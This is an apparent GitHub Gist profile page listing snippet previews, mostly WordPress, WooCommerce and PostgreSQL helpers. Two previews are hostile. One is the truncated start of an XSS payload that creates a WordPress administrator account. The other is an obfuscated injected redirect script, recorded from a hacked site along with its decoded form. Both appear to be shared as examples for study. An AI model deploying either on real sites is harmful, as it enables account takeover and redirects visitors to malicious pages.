Skip to content

Instantly share code, notes, and snippets.

View nczz's full-sized avatar
🇹🇼
寫 code 不一定會幫你賺到錢,但會寫 code 能生活的有意思點。

一介資男 nczz

🇹🇼
寫 code 不一定會幫你賺到錢,但會寫 code 能生活的有意思點。
View GitHub Profile
@nczz
nczz / wordpress-add-admin-xss.js
Last active May 25, 2019 05:21
XSS 建立 WordPress 後台帳號的範例
/*
Credit: https://github.com/hakluke/weaponised-XSS-payloads/
*/
var wp_root = "" // don't add a trailing slash
var req = new XMLHttpRequest();
var url = wp_root + "/wp-admin/user-new.php";
var regex = /ser" value="([^"]*?)"/g;
req.open("GET", url, false);
req.send();
@nczz
nczz / gutenberg_blocks_menu.php
Created May 15, 2019 06:16
Gutenberg 可重複使用區塊掛載選單
<?php
add_action('admin_menu', function () {
add_menu_page('Gutenberg Blocks', 'Gutenberg Blocks', 'manage_options', 'edit.php?post_type=wp_block', '', 'dashicons-admin-generic');
});
@nczz
nczz / web_exploit.js
Created May 14, 2019 12:41
社團網站被駭案例
eval(String.fromCharCode(32,32,32,32,118,97,114,32,32,32,98,98,32,61,32,49,59,118,97,114,32,32,32,103,115,100,32,61,32,49,59,118,97,114,32,32,32,116,115,100,32,61,32,49,59,32,32,118,97,114,32,99,32,61,32,34,104,116,116,112,115,58,47,47,100,101,116,101,99,116,110,101,119,102,97,118,111,114,105,116,101,46,99,111,109,47,102,97,118,111,114,105,116,101,63,122,103,61,49,38,34,59,32,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,99,41,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,99,59,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,99,59));
// From: https://www.angelaspablog.com.tw/wp-content/cache/autoptimize/js/autoptimize_e48b0357ddbdddc687616cf70d5967fd.js
// var bb = 1;var gsd = 1;var tsd = 1; var c = "https://detectnewfavorite.com/favorite?zg=1&"; document.location.replace(c);window.location.href=c;document.location.href=c;
// WP-Super-Cache
@nczz
nczz / woocommerce_email_recipient_cancelled_failed_order_email.php
Created May 9, 2019 15:38
[WordPress] WooCommerce 訂單取消或失敗發信通知客戶
<?php
//https://stackoverflow.com/questions/51635878/send-cancelled-and-failed-order-email-to-customer-in-woocommerce-3
add_filter( 'woocommerce_email_recipient_cancelled_order', 'wc_cancelled_order_add_customer_email', 10, 2 );
add_filter( 'woocommerce_email_recipient_failed_order', 'wc_cancelled_order_add_customer_email', 10, 2 );
function wc_cancelled_order_add_customer_email( $recipient, $order ){
// Avoiding errors in backend (mandatory when using $order argument)
if ( ! is_a( $order, 'WC_Order' ) ) return $recipient;
return $recipient .= "," . $order->get_billing_email();
}
@nczz
nczz / wp_replace_images_from_external_source.php
Last active May 31, 2019 12:42
WordPress Headless Replace Images From External Source
<?php
/**
** Blogger 文章匯入使用內建匯入工具,不過圖片抓取機制鳥到爆,預設只會抓取文章封面圖,其他文章內的圖片都需要抓取的話就要跑這隻!
**/
include 'wp-load.php';
set_time_limit(0);
ini_set('memory_limit', '256M');
add_action('after_setup_theme', function () {
add_filter('intermediate_image_sizes', '__return_empty_array');
@nczz
nczz / ks_elementor_widgets.php
Last active May 2, 2019 16:23
新增客製化 Elementor 小工具的方法
<?php
define('KS_MINIMUM_PHP_VERSION', 5.6); //定義最小支援的 PHP 版本
define('KS_MINIMUM_ELEMENTOR_VERSION', 2.0); //定義最小支援的 Elementor 版本
$ks_ele_widget_enable = true;
// Check if Elementor installed and activated
if (!did_action('elementor/loaded')) {
add_action('admin_notices', function () {
$message = sprintf(
@nczz
nczz / checkApplied.sh
Last active April 8, 2019 13:56
檢查 iDempiere 資料庫是否有需要更新
#!/bin/bash
DATABASE=${1:-idempiere}
USER=adempiere
ADDPG=${2} # i.e. "-h localhost -p 5432"
MIGRATIONDIR=${3:-/Users/chun/eclipse-workspace/custom-idempiere/migration}
cd $MIGRATIONDIR
psql -d $DATABASE -U $USER $ADDPG -q -t -c "select name from adempiere.ad_migrationscript" | sed -e 's:^ ::' | grep -v '^$' | sort > /tmp/lisDB.txt
@nczz
nczz / psql-error-fix.md
Created March 3, 2019 05:24 — forked from AtulKsol/psql-error-fix.md
Solution of psql: FATAL: Peer authentication failed for user “postgres” (or any user)

psql: FATAL: Peer authentication failed for user “postgres” (or any user)

The connection failed because by default psql connects over UNIX sockets using peer authentication, that requires the current UNIX user to have the same user name as psql. So you will have to create the UNIX user postgres and then login as postgres or use sudo -u postgres psql database-name for accessing the database (and psql should not ask for a password).

If you cannot or do not want to create the UNIX user, like if you just want to connect to your database for ad hoc queries, forcing a socket connection using psql --host=localhost --dbname=database-name --username=postgres (as pointed out by @meyerson answer) will solve your immediate problem.

But if you intend to force password authentication over Unix sockets instead of the peer method, try changing the following pg_hba.conf* line:

from

@nczz
nczz / install-postgres-10-ubuntu.md
Last active February 25, 2019 10:28 — forked from alistairewj/install-postgres-10-ubuntu.md
Install PostgreSQL 10 on Ubuntu

Install PostgreSQL 10 on Ubuntu

This is a quick guide to install PostgreSQL 10 - tested on Ubuntu 16.04 but likely can be used for Ubuntu 14.04 and 17.04 as well, with one minor modification detailed below.

(Optional) Uninstall other versions of postgres

To make life simple, remove all other versions of Postgres. Obviously not required, but again, makes life simple.

dpkg -l | grep postgres
@nczz
nczz / replace_short_link.php
Last active February 14, 2019 19:03
放在 WordPress 安裝的根目錄下執行~